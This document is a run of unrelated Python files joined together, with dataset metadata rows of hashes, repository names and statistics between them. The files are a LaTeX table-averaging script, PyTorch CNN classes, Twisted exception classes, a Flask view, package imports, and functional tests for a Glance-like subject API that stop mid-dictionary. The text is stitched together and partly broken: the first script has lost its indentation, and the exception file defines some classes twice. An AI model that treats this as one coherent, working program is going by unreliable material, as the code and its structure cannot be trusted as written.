tr[1] = [[0.7920792079207921, 0.801980198019802, 0.7722772277227723, 0.7920792079207921, 0.7920792079207921, 0.801980198019802], [0.7920792079207921, 0.7722772277227723, 0.7920792079207921, 0.801980198019802, 0.8118811881188119, 0.801980198019802], [0.7920792079207921, 0.7920792079207921, 0.7920792079207921, 0.8118811881188119, 0.8118811881188119, 0.8118811881188119], [0.7920792079207921, 0.7920792079207921, 0.801980198019802, 0.801980198019802, 0.8118811881188119, 0.801980198019802], [0.801980198019802, 0.7920792079207921, 0.8118811881188119, 0.8118811881188119, 0.801980198019802, 0.801980198019802], [0.801980198019802, 0.7920792079207921, 0.8118811881188119, 0.8118811881188119, 0.801980198019802, 0.801980198019802], [0.801980198019802, 0.7920792079207921, 0.8118811881188119, 0.8118811881188119, 0.801980198019802, 0.801980198019802]]
tr[2] = [[0.801980198019802, 0.8514851485148515, 0.8415841584158416, 0.8415841584158416, 0.8514851485148515, 0.8415841584158416], [0.8316831683168316, 0.8415841584158416, 0.8415841584158416, 0.8415841584158416, 0.8514851485148515, 0.8514851485148515], [0.8415841584158416, 0.8415841584158416, 0.8514851485148515, 0.8514851485148515, 0.8514851485148515, 0.8613861386138614], [0.8514851485148515, 0.8415841584158416, 0.8415841584158416, 0.8514851485148515, 0.8613861386138614, 0.8613861386138614], [0.8514851485148515, 0.8514851485148515, 0.8415841584158416, 0.8613861386138614, 0.8613861386138614, 0.8514851485148515], [0.8514851485148515, 0.8514851485148515, 0.8514851485148515, 0.8613861386138614, 0.8514851485148515, 0.8613861386138614], [0.8514851485148515, 0.8514851485148515, 0.8514851485148515, 0.8613861386138614, 0.8514851485148515, 0.8613861386138614]]
tr[3] = [[0.7920792079207921, 0.801980198019802, 0.7722772277227723, 0.7920792079207921, 0.7920792079207921, 0.801980198019802], [0.7920792079207921, 0.7722772277227723, 0.7920792079207921, 0.801980198019802, 0.8118811881188119, 0.801980198019802], [0.7920792079207921, 0.7920792079207921, 0.7920792079207921, 0.8118811881188119, 0.8118811881188119, 0.8118811881188119], [0.7920792079207921, 0.7920792079207921, 0.801980198019802, 0.801980198019802, 0.8118811881188119, 0.801980198019802], [0.801980198019802, 0.7920792079207921, 0.8118811881188119, 0.8118811881188119, 0.801980198019802, 0.801980198019802], [0.801980198019802, 0.7920792079207921, 0.8118811881188119, 0.8118811881188119, 0.801980198019802, 0.801980198019802], [0.801980198019802, 0.7920792079207921, 0.8118811881188119, 0.8118811881188119, 0.801980198019802, 0.801980198019802]]
tr[4] = [[0.7821782178217822, 0.7920792079207921, 0.7920792079207921, 0.8217821782178217, 0.8217821782178217, 0.8316831683168316], [0.7821782178217822, 0.7920792079207921, 0.8217821782178217, 0.8316831683168316, 0.8415841584158416, 0.8415841584158416], [0.7821782178217822, 0.7920792079207921, 0.8217821782178217, 0.8415841584158416, 0.8415841584158416, 0.8514851485148515], [0.7920792079207921, 0.8217821782178217, 0.8316831683168316, 0.8415841584158416, 0.8514851485148515, 0.8514851485148515], [0.7920792079207921, 0.8217821782178217, 0.8415841584158416, 0.8415841584158416, 0.8514851485148515, 0.8514851485148515], [0.7920792079207921, 0.8217821782178217, 0.8415841584158416, 0.8514851485148515, 0.8514851485148515, 0.8514851485148515], [0.801980198019802, 0.8217821782178217, 0.8415841584158416, 0.8514851485148515, 0.8514851485148515, 0.8514851485148515]]
tr[5] = [[0.801980198019802, 0.8514851485148515, 0.8415841584158416, 0.8415841584158416, 0.8514851485148515, 0.8415841584158416], [0.8316831683168316, 0.8415841584158416, 0.8415841584158416, 0.8415841584158416, 0.8514851485148515, 0.8514851485148515], [0.8415841584158416, 0.8415841584158416, 0.8514851485148515, 0.8514851485148515, 0.8514851485148515, 0.8613861386138614], [0.8514851485148515, 0.8415841584158416, 0.8415841584158416, 0.8514851485148515, 0.8613861386138614, 0.8613861386138614], [0.8514851485148515, 0.8514851485148515, 0.8415841584158416, 0.8613861386138614, 0.8613861386138614, 0.8514851485148515], [0.8514851485148515, 0.8514851485148515, 0.8514851485148515, 0.8613861386138614, 0.8514851485148515, 0.8613861386138614], [0.8514851485148515, 0.8514851485148515, 0.8514851485148515, 0.8613861386138614, 0.8514851485148515, 0.8613861386138614]]
tr[6] = [[0.7821782178217822, 0.7920792079207921, 0.7920792079207921, 0.8217821782178217, 0.8217821782178217, 0.8316831683168316], [0.7821782178217822, 0.7920792079207921, 0.8217821782178217, 0.8316831683168316, 0.8415841584158416, 0.8415841584158416], [0.7821782178217822, 0.7920792079207921, 0.8217821782178217, 0.8415841584158416, 0.8415841584158416, 0.8514851485148515], [0.7920792079207921, 0.8217821782178217, 0.8316831683168316, 0.8415841584158416, 0.8514851485148515, 0.8514851485148515], [0.7920792079207921, 0.8217821782178217, 0.8415841584158416, 0.8415841584158416, 0.8514851485148515, 0.8514851485148515], [0.7920792079207921, 0.8217821782178217, 0.8415841584158416, 0.8514851485148515, 0.8514851485148515, 0.8514851485148515], [0.801980198019802, 0.8217821782178217, 0.8415841584158416, 0.8514851485148515, 0.8514851485148515, 0.8514851485148515]]
answer = []
for j in range(len(tr[1])):
temp = []
for k in range(len(tr[1][j])):
temp_num = 0
for i in range(1,7):
temp_num += tr[i][j][k]
temp_num /= 6
temp.append(temp_num)
answer.append(temp)
x = 500
for i in answer:
print("\\textbf{"+str(x)+"} & ", end="")
x += 500
for j in i:
print(str(round(j, 4)) + " & ", end="")
print("\\\\")
| 172.90625 | 861 | 0.805892 | 583 | 5,533 | 7.641509 | 0.063465 | 0.236588 | 0.242424 | 0.228956 | 0.961167 | 0.955331 | 0.955331 | 0.955331 | 0.955331 | 0.955331 | 0 | 0.826297 | 0.066691 | 5,533 | 31 | 862 | 178.483871 | 0.036406 | 0 | 0 | 0 | 0 | 0 | 0.003615 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.125 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 12 |
344dea78154822d22fa6bae67f4ec7a6eaffbace | 764 | py | Python | src/estimators/__init__.py | kjhall01/xcast | 17edfd8c79c5163b004800170bbcf21302e8c792 | [
"MIT"
] | 11 | 2021-11-01T21:38:17.000Z | 2022-03-30T11:46:32.000Z | src/estimators/__init__.py | kjhall01/xcast | 17edfd8c79c5163b004800170bbcf21302e8c792 | [
"MIT"
] | 7 | 2021-10-30T16:55:47.000Z | 2021-12-04T18:51:50.000Z | src/estimators/__init__.py | kjhall01/xcast | 17edfd8c79c5163b004800170bbcf21302e8c792 | [
"MIT"
] | 1 | 2021-11-18T10:35:29.000Z | 2021-11-18T10:35:29.000Z | from .base_estimator import BaseEstimator
from .classifiers import cMemberCount, cMultivariateLogisticRegression, cExtendedLogisticRegression, cMultiLayerPerceptron, cNaiveBayes, cRandomForest, cPOELM
from .regressors import EnsembleMean, BiasCorrectedEnsembleMean, rMultipleLinearRegression, rPoissonRegression, rGammaRegression, rMultiLayerPerceptron, rRandomForest, rRidgeRegression, rExtremeLearningMachine
classifiers = [cMemberCount, cMultivariateLogisticRegression, cExtendedLogisticRegression, cMultiLayerPerceptron, cNaiveBayes, cRandomForest, cPOELM]
regressors = [EnsembleMean, BiasCorrectedEnsembleMean, rMultipleLinearRegression, rPoissonRegression, rGammaRegression, rMultiLayerPerceptron, rRandomForest, rRidgeRegression, rExtremeLearningMachine]
| 95.5 | 209 | 0.888743 | 45 | 764 | 15.066667 | 0.511111 | 0.126844 | 0.20649 | 0.268437 | 0.855457 | 0.855457 | 0.855457 | 0.498525 | 0.498525 | 0 | 0 | 0 | 0.062827 | 764 | 7 | 210 | 109.142857 | 0.946927 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.6 | 0 | 0.6 | 0 | 0 | 0 | 1 | null | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 9 |
346abe9b8b3737e0012efa04ffe7290d77916309 | 1,045 | py | Python | juno_magic/exception.py | y1ngyang/juno-magic | 108292ac747243ba1d80b9a42abcdc84ef8b6cb3 | [
"MIT"
] | 4 | 2016-06-19T13:07:51.000Z | 2017-01-05T18:01:52.000Z | juno_magic/exception.py | y1ngyang/juno-magic | 108292ac747243ba1d80b9a42abcdc84ef8b6cb3 | [
"MIT"
] | 37 | 2018-11-22T08:39:58.000Z | 2021-06-25T15:16:57.000Z | juno_magic/exception.py | y1ngyang/juno-magic | 108292ac747243ba1d80b9a42abcdc84ef8b6cb3 | [
"MIT"
] | 4 | 2016-06-22T02:19:16.000Z | 2016-06-28T15:37:05.000Z | from twisted.internet.error import ConnectError, ConnectionLost
class CloseHandshakeError(ConnectionLost):
"""Connection to the other side was lost in a non-clean fashion"""
class MaxFramePayloadSizeExceededError(ConnectionLost):
"""Connection to the other side was lost in a non-clean fashion"""
class MaxMessagePayloadSizeExceededError(ConnectionLost):
"""Connection to the other side was lost in a non-clean fashion"""
class OpenHandshakeTimeoutError(ConnectError):
"""An error occurred while connecting"""
class ServerConnectionDropTimeoutError(ConnectionLost):
"""Connection to the other side was lost in a non-clean fashion"""
class ServingFlashSocketPolicyFileError(ConnectionLost):
"""Connection to the other side was lost in a non-clean fashion"""
class MaxMessagePayloadSizeExceededError(ConnectionLost):
"""Connection to the other side was lost in a non-clean fashion"""
class MaxFramePayloadSizeExceededError(ConnectionLost):
"""Connection to the other side was lost in a non-clean fashion"""
| 40.192308 | 70 | 0.784689 | 120 | 1,045 | 6.833333 | 0.25 | 0.204878 | 0.221951 | 0.247561 | 0.735366 | 0.735366 | 0.735366 | 0.735366 | 0.735366 | 0.735366 | 0 | 0 | 0.136842 | 1,045 | 25 | 71 | 41.8 | 0.909091 | 0.441148 | 0 | 0.444444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.111111 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 10 |
cab3c300a987d58ef06241b8c44bdb7755e49f21 | 152 | py | Python | app/main/views.py | liulixiang1988/webapp | 695722964c89db7d0ce1edd14b617b5597031c82 | [
"MIT"
] | 1 | 2015-08-17T03:51:31.000Z | 2015-08-17T03:51:31.000Z | app/main/views.py | liulixiang1988/webapp | 695722964c89db7d0ce1edd14b617b5597031c82 | [
"MIT"
] | null | null | null | app/main/views.py | liulixiang1988/webapp | 695722964c89db7d0ce1edd14b617b5597031c82 | [
"MIT"
] | null | null | null | # -*- coding:utf-8 -*-
from flask import render_template
from . import main
@main.route('/')
def index():
return render_template('main/index.html') | 21.714286 | 45 | 0.690789 | 21 | 152 | 4.904762 | 0.666667 | 0.271845 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007634 | 0.138158 | 152 | 7 | 45 | 21.714286 | 0.778626 | 0.131579 | 0 | 0 | 0 | 0 | 0.122137 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | true | 0 | 0.4 | 0.2 | 0.8 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
cab5db8407c4f2a348d1fe637ce8036798959ea7 | 176 | py | Python | fruits/words/__init__.py | alienkrieg/fruits | b3b4b6afd7f97d2d4060909689f9811dc97981ed | [
"MIT"
] | 4 | 2021-10-08T11:14:54.000Z | 2021-12-30T13:56:32.000Z | fruits/words/__init__.py | alienkrieg/fruits | b3b4b6afd7f97d2d4060909689f9811dc97981ed | [
"MIT"
] | null | null | null | fruits/words/__init__.py | alienkrieg/fruits | b3b4b6afd7f97d2d4060909689f9811dc97981ed | [
"MIT"
] | null | null | null | from fruits.words.word import Word, SimpleWord
from fruits.words.letters import ExtendedLetter, letter
from fruits.words.creation import simplewords_by_weight, replace_letters
| 44 | 72 | 0.863636 | 24 | 176 | 6.208333 | 0.583333 | 0.201342 | 0.302013 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085227 | 176 | 3 | 73 | 58.666667 | 0.925466 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
cae56fe3f2eda8b74124aa3cb518e5107c078959 | 1,986 | py | Python | src/models.py | aldipiroli/mnist_cnn | 8ce90473ace868e3bcd9fe7025ba5bbb7f1e9010 | [
"MIT"
] | null | null | null | src/models.py | aldipiroli/mnist_cnn | 8ce90473ace868e3bcd9fe7025ba5bbb7f1e9010 | [
"MIT"
] | null | null | null | src/models.py | aldipiroli/mnist_cnn | 8ce90473ace868e3bcd9fe7025ba5bbb7f1e9010 | [
"MIT"
] | null | null | null | import torch
import torch.nn as nn
import torch.nn.functional as F
class ConvNet2L(nn.Module):
def __init__(self):
super(ConvNet2L, self).__init__()
self.layer1 = nn.Sequential(
nn.Conv2d(1, 32, kernel_size=5, stride=1, padding=2),
nn.ReLU(),
nn.MaxPool2d(kernel_size=2, stride=2))
self.layer2 = nn.Sequential(
nn.Conv2d(32, 64, kernel_size=5, stride=1, padding=2),
nn.ReLU(),
nn.MaxPool2d(kernel_size=2, stride=2))
self.drop_out = nn.Dropout()
self.fc1 = nn.Linear(7 * 7 * 64, 1000)
self.fc2 = nn.Linear(1000, 10)
def forward(self, x):
out = self.layer1(x)
out = self.layer2(out)
out = out.reshape(out.size(0), -1)
out = self.drop_out(out)
out = self.fc1(out)
out = self.fc2(out)
out = F.softmax(out, dim=1)
return out
class ConvNet3L(nn.Module):
def __init__(self):
super(ConvNet3L, self).__init__()
self.layer1 = nn.Sequential(
nn.Conv2d(1, 32, kernel_size=5, stride=1, padding=2),
nn.ReLU(),
nn.MaxPool2d(kernel_size=2, stride=2))
self.layer2 = nn.Sequential(
nn.Conv2d(32, 64, kernel_size=5, stride=1, padding=2),
nn.ReLU(),
nn.MaxPool2d(kernel_size=2, stride=2))
self.layer3 = nn.Sequential(
nn.Conv2d(64, 128, kernel_size=5, stride=1, padding=2),
nn.ReLU(),
nn.MaxPool2d(kernel_size=2, stride=2))
self.drop_out = nn.Dropout()
self.fc1 = nn.Linear(3 * 3 * 128, 1000)
self.fc2 = nn.Linear(1000, 10)
def forward(self, x):
out = self.layer1(x)
out = self.layer2(out)
out = self.layer3(out)
out = out.reshape(out.size(0), -1)
out = self.drop_out(out)
out = self.fc1(out)
out = self.fc2(out)
out = F.softmax(out, dim=1)
return out | 32.557377 | 67 | 0.547331 | 277 | 1,986 | 3.815884 | 0.173285 | 0.073794 | 0.066225 | 0.094607 | 0.858089 | 0.858089 | 0.812677 | 0.812677 | 0.812677 | 0.812677 | 0 | 0.081259 | 0.312185 | 1,986 | 61 | 68 | 32.557377 | 0.692533 | 0 | 0 | 0.777778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.074074 | false | 0 | 0.055556 | 0 | 0.203704 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1b04120573fe644b3ee867b0c0f0d3fb5ecc57f5 | 74,685 | py | Python | subject/tests/integration/legacy_functional/test_v1_api.py | laoyigrace/subject | e6ed989fdc250917a19788112b22322b73b3550f | [
"Apache-2.0"
] | null | null | null | subject/tests/integration/legacy_functional/test_v1_api.py | laoyigrace/subject | e6ed989fdc250917a19788112b22322b73b3550f | [
"Apache-2.0"
] | null | null | null | subject/tests/integration/legacy_functional/test_v1_api.py | laoyigrace/subject | e6ed989fdc250917a19788112b22322b73b3550f | [
"Apache-2.0"
] | null | null | null | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import hashlib
import os
import tempfile
from oslo_serialization import jsonutils
from oslo_utils import units
import testtools
from subject.common import timeutils
from subject.tests.integration.legacy_functional import base
from subject.tests.utils import minimal_headers
FIVE_KB = 5 * units.Ki
FIVE_GB = 5 * units.Gi
class TestApi(base.ApiTest):
def test_get_head_simple_post(self):
# 0. GET /subjects
# Verify no public subjects
path = "/v1/subjects"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
self.assertEqual('{"subjects": []}', content)
# 1. GET /subjects/detail
# Verify no public subjects
path = "/v1/subjects/detail"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
self.assertEqual('{"subjects": []}', content)
# 2. POST /subjects with public subject named Subject1
# attribute and no custom properties. Verify a 200 OK is returned
subject_data = "*" * FIVE_KB
headers = minimal_headers('Subject1')
path = "/v1/subjects"
response, content = self.http.request(path, 'POST', headers=headers,
body=subject_data)
self.assertEqual(201, response.status)
data = jsonutils.loads(content)
subject_id = data['subject']['id']
self.assertEqual(hashlib.md5(subject_data).hexdigest(),
data['subject']['checksum'])
self.assertEqual(FIVE_KB, data['subject']['size'])
self.assertEqual("Subject1", data['subject']['name'])
self.assertTrue(data['subject']['is_public'])
# 3. HEAD subject
# Verify subject found now
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'HEAD')
self.assertEqual(200, response.status)
self.assertEqual("Subject1", response['x-subject-meta-name'])
# 4. GET subject
# Verify all information on subject we just added is correct
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
expected_subject_headers = {
'x-subject-meta-id': subject_id,
'x-subject-meta-name': 'Subject1',
'x-subject-meta-is_public': 'True',
'x-subject-meta-status': 'active',
'x-subject-meta-disk_format': 'raw',
'x-subject-meta-container_format': 'ovf',
'x-subject-meta-size': str(FIVE_KB)}
expected_std_headers = {
'content-length': str(FIVE_KB),
'content-type': 'application/octet-stream'}
for expected_key, expected_value in expected_subject_headers.items():
self.assertEqual(expected_value, response[expected_key],
"For key '%s' expected header value '%s'. "
"Got '%s'" % (expected_key,
expected_value,
response[expected_key]))
for expected_key, expected_value in expected_std_headers.items():
self.assertEqual(expected_value, response[expected_key],
"For key '%s' expected header value '%s'. "
"Got '%s'" % (expected_key,
expected_value,
response[expected_key]))
self.assertEqual("*" * FIVE_KB, content)
self.assertEqual(hashlib.md5("*" * FIVE_KB).hexdigest(),
hashlib.md5(content).hexdigest())
# 5. GET /subjects
# Verify no public subjects
path = "/v1/subjects"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
expected_result = {"subjects": [
{"container_format": "ovf",
"disk_format": "raw",
"id": subject_id,
"name": "Subject1",
"checksum": "c2e5db72bd7fd153f53ede5da5a06de3",
"size": 5120}]}
self.assertEqual(expected_result, jsonutils.loads(content))
# 6. GET /subjects/detail
# Verify subject and all its metadata
path = "/v1/subjects/detail"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
expected_subject = {
"status": "active",
"name": "Subject1",
"deleted": False,
"container_format": "ovf",
"disk_format": "raw",
"id": subject_id,
"is_public": True,
"deleted_at": None,
"properties": {},
"size": 5120}
subject = jsonutils.loads(content)
for expected_key, expected_value in expected_subject.items():
self.assertEqual(expected_value, subject['subjects'][0][expected_key],
"For key '%s' expected header value '%s'. "
"Got '%s'" % (expected_key,
expected_value,
subject['subjects'][0][expected_key]))
# 7. PUT subject with custom properties of "distro" and "arch"
# Verify 200 returned
headers = {'X-Subject-Meta-Property-Distro': 'Ubuntu',
'X-Subject-Meta-Property-Arch': 'x86_64'}
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'PUT', headers=headers)
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual("x86_64", data['subject']['properties']['arch'])
self.assertEqual("Ubuntu", data['subject']['properties']['distro'])
# 8. GET /subjects/detail
# Verify subject and all its metadata
path = "/v1/subjects/detail"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
expected_subject = {
"status": "active",
"name": "Subject1",
"deleted": False,
"container_format": "ovf",
"disk_format": "raw",
"id": subject_id,
"is_public": True,
"deleted_at": None,
"properties": {'distro': 'Ubuntu', 'arch': 'x86_64'},
"size": 5120}
subject = jsonutils.loads(content)
for expected_key, expected_value in expected_subject.items():
self.assertEqual(expected_value, subject['subjects'][0][expected_key],
"For key '%s' expected header value '%s'. "
"Got '%s'" % (expected_key,
expected_value,
subject['subjects'][0][expected_key]))
# 9. PUT subject and remove a previously existing property.
headers = {'X-Subject-Meta-Property-Arch': 'x86_64'}
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'PUT', headers=headers)
self.assertEqual(200, response.status)
path = "/v1/subjects/detail"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)['subjects'][0]
self.assertEqual(1, len(data['properties']))
self.assertEqual("x86_64", data['properties']['arch'])
# 10. PUT subject and add a previously deleted property.
headers = {'X-Subject-Meta-Property-Distro': 'Ubuntu',
'X-Subject-Meta-Property-Arch': 'x86_64'}
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'PUT', headers=headers)
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
path = "/v1/subjects/detail"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)['subjects'][0]
self.assertEqual(2, len(data['properties']))
self.assertEqual("x86_64", data['properties']['arch'])
self.assertEqual("Ubuntu", data['properties']['distro'])
self.assertNotEqual(data['created_at'], data['updated_at'])
# DELETE subject
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'DELETE')
self.assertEqual(200, response.status)
def test_queued_process_flow(self):
"""
We test the process flow where a user registers an subject
with Glance but does not immediately upload an subject file.
Later, the user uploads an subject file using a PUT operation.
We track the changing of subject status throughout this process.
0. GET /subjects
- Verify no public subjects
1. POST /subjects with public subject named Subject1 with no location
attribute and no subject data.
- Verify 201 returned
2. GET /subjects
- Verify one public subject
3. HEAD subject
- Verify subject now in queued status
4. PUT subject with subject data
- Verify 200 returned
5. HEAD subjects
- Verify subject now in active status
6. GET /subjects
- Verify one public subject
"""
# 0. GET /subjects
# Verify no public subjects
path = "/v1/subjects"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
self.assertEqual('{"subjects": []}', content)
# 1. POST /subjects with public subject named Subject1
# with no location or subject data
headers = minimal_headers('Subject1')
path = "/v1/subjects"
response, content = self.http.request(path, 'POST', headers=headers)
self.assertEqual(201, response.status)
data = jsonutils.loads(content)
self.assertIsNone(data['subject']['checksum'])
self.assertEqual(0, data['subject']['size'])
self.assertEqual('ovf', data['subject']['container_format'])
self.assertEqual('raw', data['subject']['disk_format'])
self.assertEqual("Subject1", data['subject']['name'])
self.assertTrue(data['subject']['is_public'])
subject_id = data['subject']['id']
# 2. GET /subjects
# Verify 1 public subject
path = "/v1/subjects"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(subject_id, data['subjects'][0]['id'])
self.assertIsNone(data['subjects'][0]['checksum'])
self.assertEqual(0, data['subjects'][0]['size'])
self.assertEqual('ovf', data['subjects'][0]['container_format'])
self.assertEqual('raw', data['subjects'][0]['disk_format'])
self.assertEqual("Subject1", data['subjects'][0]['name'])
# 3. HEAD /subjects
# Verify status is in queued
path = "/v1/subjects/%s" % (subject_id)
response, content = self.http.request(path, 'HEAD')
self.assertEqual(200, response.status)
self.assertEqual("Subject1", response['x-subject-meta-name'])
self.assertEqual("queued", response['x-subject-meta-status'])
self.assertEqual('0', response['x-subject-meta-size'])
self.assertEqual(subject_id, response['x-subject-meta-id'])
# 4. PUT subject with subject data, verify 200 returned
subject_data = "*" * FIVE_KB
headers = {'Content-Type': 'application/octet-stream'}
path = "/v1/subjects/%s" % (subject_id)
response, content = self.http.request(path, 'PUT', headers=headers,
body=subject_data)
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(hashlib.md5(subject_data).hexdigest(),
data['subject']['checksum'])
self.assertEqual(FIVE_KB, data['subject']['size'])
self.assertEqual("Subject1", data['subject']['name'])
self.assertTrue(data['subject']['is_public'])
# 5. HEAD /subjects
# Verify status is in active
path = "/v1/subjects/%s" % (subject_id)
response, content = self.http.request(path, 'HEAD')
self.assertEqual(200, response.status)
self.assertEqual("Subject1", response['x-subject-meta-name'])
self.assertEqual("active", response['x-subject-meta-status'])
# 6. GET /subjects
# Verify 1 public subject still...
path = "/v1/subjects"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(hashlib.md5(subject_data).hexdigest(),
data['subjects'][0]['checksum'])
self.assertEqual(subject_id, data['subjects'][0]['id'])
self.assertEqual(FIVE_KB, data['subjects'][0]['size'])
self.assertEqual('ovf', data['subjects'][0]['container_format'])
self.assertEqual('raw', data['subjects'][0]['disk_format'])
self.assertEqual("Subject1", data['subjects'][0]['name'])
# DELETE subject
path = "/v1/subjects/%s" % (subject_id)
response, content = self.http.request(path, 'DELETE')
self.assertEqual(200, response.status)
def test_v1_not_enabled(self):
self.config(enable_v1_api=False)
path = "/v1/subjects"
response, content = self.http.request(path, 'GET')
self.assertEqual(300, response.status)
def test_v1_enabled(self):
self.config(enable_v1_api=True)
path = "/v1/subjects"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
def test_zero_initial_size(self):
"""
A test to ensure that an subject with size explicitly set to zero
has status that immediately transitions to active.
"""
# 1. POST /subjects with public subject named Subject1
# attribute and a size of zero.
# Verify a 201 OK is returned
headers = {'Content-Type': 'application/octet-stream',
'X-Subject-Meta-Size': '0',
'X-Subject-Meta-Name': 'Subject1',
'X-Subject-Meta-disk_format': 'raw',
'X-subject-Meta-container_format': 'ovf',
'X-Subject-Meta-Is-Public': 'True'}
path = "/v1/subjects"
response, content = self.http.request(path, 'POST', headers=headers)
self.assertEqual(201, response.status)
subject = jsonutils.loads(content)['subject']
self.assertEqual('active', subject['status'])
# 2. HEAD subject-location
# Verify subject size is zero and the status is active
path = response.get('location')
response, content = self.http.request(path, 'HEAD')
self.assertEqual(200, response.status)
self.assertEqual('0', response['x-subject-meta-size'])
self.assertEqual('active', response['x-subject-meta-status'])
# 3. GET subject-location
# Verify subject content is empty
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
self.assertEqual(0, len(content))
def test_traceback_not_consumed(self):
"""
A test that errors coming from the POST API do not
get consumed and print the actual error message, and
not something like <traceback object at 0x1918d40>
:see https://bugs.launchpad.net/subject/+bug/755912
"""
# POST /subjects with binary data, but not setting
# Content-Type to application/octet-stream, verify a
# 400 returned and that the error is readable.
with tempfile.NamedTemporaryFile() as test_data_file:
test_data_file.write("XXX")
test_data_file.flush()
path = "/v1/subjects"
headers = minimal_headers('Subject1')
headers['Content-Type'] = 'not octet-stream'
response, content = self.http.request(path, 'POST',
body=test_data_file.name,
headers=headers)
self.assertEqual(400, response.status)
expected = "Content-Type must be application/octet-stream"
self.assertIn(expected, content,
"Could not find '%s' in '%s'" % (expected, content))
def test_filtered_subjects(self):
"""
Set up four test subjects and ensure each query param filter works
"""
# 0. GET /subjects
# Verify no public subjects
path = "/v1/subjects"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
self.assertEqual('{"subjects": []}', content)
subject_ids = []
# 1. POST /subjects with three public subjects, and one private subject
# with various attributes
headers = {'Content-Type': 'application/octet-stream',
'X-Subject-Meta-Name': 'Subject1',
'X-Subject-Meta-Status': 'active',
'X-Subject-Meta-Container-Format': 'ovf',
'X-Subject-Meta-Disk-Format': 'vdi',
'X-Subject-Meta-Size': '19',
'X-Subject-Meta-Is-Public': 'True',
'X-Subject-Meta-Protected': 'True',
'X-Subject-Meta-Property-pants': 'are on'}
path = "/v1/subjects"
response, content = self.http.request(path, 'POST', headers=headers)
self.assertEqual(201, response.status)
data = jsonutils.loads(content)
self.assertEqual("are on", data['subject']['properties']['pants'])
self.assertTrue(data['subject']['is_public'])
subject_ids.append(data['subject']['id'])
headers = {'Content-Type': 'application/octet-stream',
'X-Subject-Meta-Name': 'My Subject!',
'X-Subject-Meta-Status': 'active',
'X-Subject-Meta-Container-Format': 'ovf',
'X-Subject-Meta-Disk-Format': 'vhd',
